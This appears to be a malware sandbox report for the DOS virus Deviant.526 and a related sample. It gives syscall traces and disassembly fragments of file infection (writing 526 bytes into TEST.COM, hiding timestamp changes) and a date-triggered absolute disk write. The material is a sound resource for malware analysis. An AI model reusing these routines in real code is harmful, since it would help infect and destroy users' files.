Sample viewer

vx.netlux.org/Virus.DOS.Deviant.526


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:21:42.043399939Z 26 PC: 12a77 | Set disk transfer address
2018-12-17T22:21:42.044735192Z 71 PC: 12a83 | Get current directory
2018-12-17T22:21:42.048782774Z 78 PC: 12a8d | Find first file
2018-12-17T22:21:42.070571003Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.073390021Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.077030624Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.080082978Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.083863537Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.087804966Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.090610921Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.093435449Z 67 PC: 12ac1 | Get or set file attributes
2018-12-17T22:21:42.166097501Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:21:42.177115814Z 66 PC: 12ad6 | Move file pointer
2018-12-17T22:21:42.184173348Z 63 PC: 12ae1 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:21:42.189037176Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:21:42.190972588Z 44 PC: 12afd | Get time
0x12afd: mov byte ptr ds:[bp + 0x314], dl
0x12b02: call 0x22a59
0x12b05: mov ah, 0x40
0x12b07: lea dx, word ptr [bp + 0x107]
0x12b0b: mov cx, 0x20e
0x12b0e: int 0x21
0x12b10: call 0x22a59
0x12b13: mov ax, 0x5701
0x12b16: mov cx, word ptr ds:[bp + 0x297]
0x12b1b: mov dx, word ptr ds:[bp + 0x299]
0x12b20: int 0x21
0x12b22: mov ah, 0x3e
0x12b24: int 0x21
0x12b26: mov ax, 0x4301
0x12b29: xor cx, cx
0x12b2b: mov cl, byte ptr ds:[bp + 0x296]
0x12b30: int 0x21
0x12b32: mov ah, 0x4f
0x12b34: jmp 0x12a85
0x12b37: mov ah, 0x3b
2018-12-17T22:21:42.193961827Z 64 PC: 12b10 | Write file or device (Write 526 bytes on handle 5)
2018-12-17T22:21:42.203338105Z 87 PC: 12b22 | Get or set file date and time
2018-12-17T22:21:42.205584391Z 62 PC: 12b26 | Close file
2018-12-17T22:21:42.211431292Z 67 PC: 12b32 | Get or set file attributes
2018-12-17T22:21:42.216888285Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.220049524Z 59 PC: 12a9a | Change current directory
2018-12-17T22:21:42.224954887Z 59 PC: 12b3f | Change current directory
2018-12-17T22:21:42.22983831Z 42 PC: 12b43 | Get date
0x12b43: cmp dl, 0xc
0x12b46: jne 0x12b53
0x12b48: mov ah, 9
0x12b4a: lea dx, word ptr [bp + 0x2c3]
0x12b4e: int 0x21
0x12b50: jmp 0x12b5b
0x12b52: nop
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x2a0]
0x12b59: int 0x21
0x12b5b: mov ah, 0x4c
0x12b5d: int 0x21
0x12b5f: sub ch, byte ptr [0x4f43]
0x12b63: dec bp
0x12b64: add byte ptr [0x2e], ch
0x12b68: pop sp
0x12b69: add byte ptr [bx + si], al
0x12b6b: add byte ptr [bx + si], al
0x12b6d: add byte ptr [bx + si], al
0x12b6f: add byte ptr [bx + si], al
2018-12-17T22:21:42.236549066Z 9 PC: 12b5b | Display string (String= 'Program too big to fit in memory ')
2018-12-17T22:21:42.241179666Z 76 PC: 12b5f | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3783,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:15.078717687Z 26 PC: 12a77 | Set disk transfer address
2018-12-25T11:50:15.080113546Z 71 PC: 12a83 | Get current directory
2018-12-25T11:50:15.083877393Z 78 PC: 12a8d | Find first file
2018-12-25T11:50:15.091285462Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.094006804Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.10544217Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.108393269Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.111212976Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.114511714Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.117746272Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.120762417Z 67 PC: 12ac1 | Get or set file attributes
2018-12-25T11:50:15.138838216Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-25T11:50:15.146457126Z 66 PC: 12ad6 | Move file pointer
2018-12-25T11:50:15.14783383Z 63 PC: 12ae1 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:50:15.15008557Z 66 PC: 12af9 | Move file pointer
2018-12-25T11:50:15.151491351Z 44 PC: 12afd | Get time
0x12afd: mov byte ptr ds:[bp + 0x314], dl
0x12b02: call 0x22a59
0x12b05: mov ah, 0x40
0x12b07: lea dx, word ptr [bp + 0x107]
0x12b0b: mov cx, 0x20e
0x12b0e: int 0x21
0x12b10: call 0x22a59
0x12b13: mov ax, 0x5701
0x12b16: mov cx, word ptr ds:[bp + 0x297]
0x12b1b: mov dx, word ptr ds:[bp + 0x299]
0x12b20: int 0x21
0x12b22: mov ah, 0x3e
0x12b24: int 0x21
0x12b26: mov ax, 0x4301
0x12b29: xor cx, cx
0x12b2b: mov cl, byte ptr ds:[bp + 0x296]
0x12b30: int 0x21
0x12b32: mov ah, 0x4f
0x12b34: jmp 0x12a85
0x12b37: mov ah, 0x3b
2018-12-25T11:50:15.153888628Z 64 PC: 12b10 | Write file or device (Write 526 bytes on handle 5)
2018-12-25T11:50:15.162588935Z 87 PC: 12b22 | Get or set file date and time
2018-12-25T11:50:15.164085949Z 62 PC: 12b26 | Close file
2018-12-25T11:50:15.172325036Z 67 PC: 12b32 | Get or set file attributes
2018-12-25T11:50:15.179010798Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.181575791Z 59 PC: 12a9a | Change current directory
2018-12-25T11:50:15.185970078Z 59 PC: 12b3f | Change current directory
2018-12-25T11:50:15.190181751Z 42 PC: 12b43 | Get date
0x12b43: cmp dl, 0xc
0x12b46: jne 0x12b53
0x12b48: mov ah, 9
0x12b4a: lea dx, word ptr [bp + 0x2c3]
0x12b4e: int 0x21
0x12b50: jmp 0x12b5b
0x12b52: nop
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x2a0]
0x12b59: int 0x21
0x12b5b: mov ah, 0x4c
0x12b5d: int 0x21
0x12b5f: sub ch, byte ptr [0x4f43]
0x12b63: dec bp
0x12b64: add byte ptr [0x2e], ch
0x12b68: pop sp
0x12b69: add byte ptr [bx + si], al
0x12b6b: add byte ptr [bx + si], al
0x12b6d: add byte ptr [bx + si], al
0x12b6f: add byte ptr [bx + si], al
2018-12-25T11:50:15.19241359Z 9 PC: 12b5b | Display string (String= 'Program too big to fit in memory ')
2018-12-25T11:50:15.196735522Z 76 PC: 12b5f | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":12,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3783,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:15.160905921Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-25T11:50:15.162429891Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-25T11:50:15.165022332Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:15.166715447Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:15.168370951Z 26 PC: 12a7d | Set disk transfer address
2018-12-25T11:50:15.171213688Z 78 PC: 12aa0 | Find first file
2018-12-25T11:50:15.177975394Z 67 PC: 12ac9 | Get or set file attributes
2018-12-25T11:50:15.18491927Z 67 PC: 12b76 | Get or set file attributes
2018-12-25T11:50:15.203289417Z 61 PC: 12ad6 | Open file (Filename = '&')
2018-12-25T11:50:15.210538692Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:50:15.211929877Z 63 PC: 12aeb | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:15.219780124Z 66 PC: 12b85 | Move file pointer
2018-12-25T11:50:15.221213943Z 87 PC: 12b3a | Get or set file date and time
2018-12-25T11:50:15.222676311Z 62 PC: 12b3e | Close file
2018-12-25T11:50:15.230782026Z 42 PC: 12b47 | Get date
0x12b47: cmp dl, 1
0x12b4a: je 0x12b4f
0x12b4c: jmp 0x12b6d
0x12b4f: cli
0x12b50: mov ah, 2
0x12b52: cdq
0x12b53: mov cx, 0x100
0x12b56: int 0x26
0x12b58: jmp 0x12b5b
0x12b5b: mov al, 3
0x12b5d: mov cx, 0x700
0x12b60: mov dx, 0
0x12b63: mov ds, word ptr [di + 0x99]
0x12b67: mov bx, word ptr [di + 0x55]
0x12b6a: call 0x22b4f
0x12b6d: mov dx, word ptr [bp + 0x24d]
0x12b71: mov ax, 0x4301
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ax, 0x4200
2018-12-25T11:50:15.233366107Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.238561739Z 79 PC: 12aab | Find next file
2018-12-25T11:50:15.24132108Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.247694853Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.26147573Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.268678635Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.271493664Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.278629843Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.280296997Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.283169828Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.291010077Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.293448237Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.299889927Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.302874715Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.309256485Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.323408132Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.331022411Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.332642104Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.339699513Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.34161311Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.343198485Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.350956912Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.353849979Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.359146834Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.362112772Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.369572672Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.383838693Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.391804828Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.394341422Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.401432352Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.402928648Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.405029377Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.413204782Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.415281464Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.420793948Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.423689002Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.429966944Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.441660009Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.455904618Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.45734662Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.464266788Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.466243026Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.46778662Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.475515844Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.47836199Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.483659899Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.486313706Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.493369427Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.504303987Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.517551237Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.51986311Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.526867668Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.528367779Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.530082416Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.537805557Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.539998535Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.545147061Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.548279728Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.554417123Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.579686345Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.587124485Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.588586696Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.595989266Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.59924702Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.601394014Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.610108025Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.613973888Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.618763867Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.621520799Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.628862614Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.637755769Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.64289934Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.644372944Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.649520523Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.650774671Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.660122058Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.664238268Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.670011747Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.672135792Z 37 PC: 12ab4 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:15.674069505Z 51 PC: 12aba | Get or set Ctrl-Break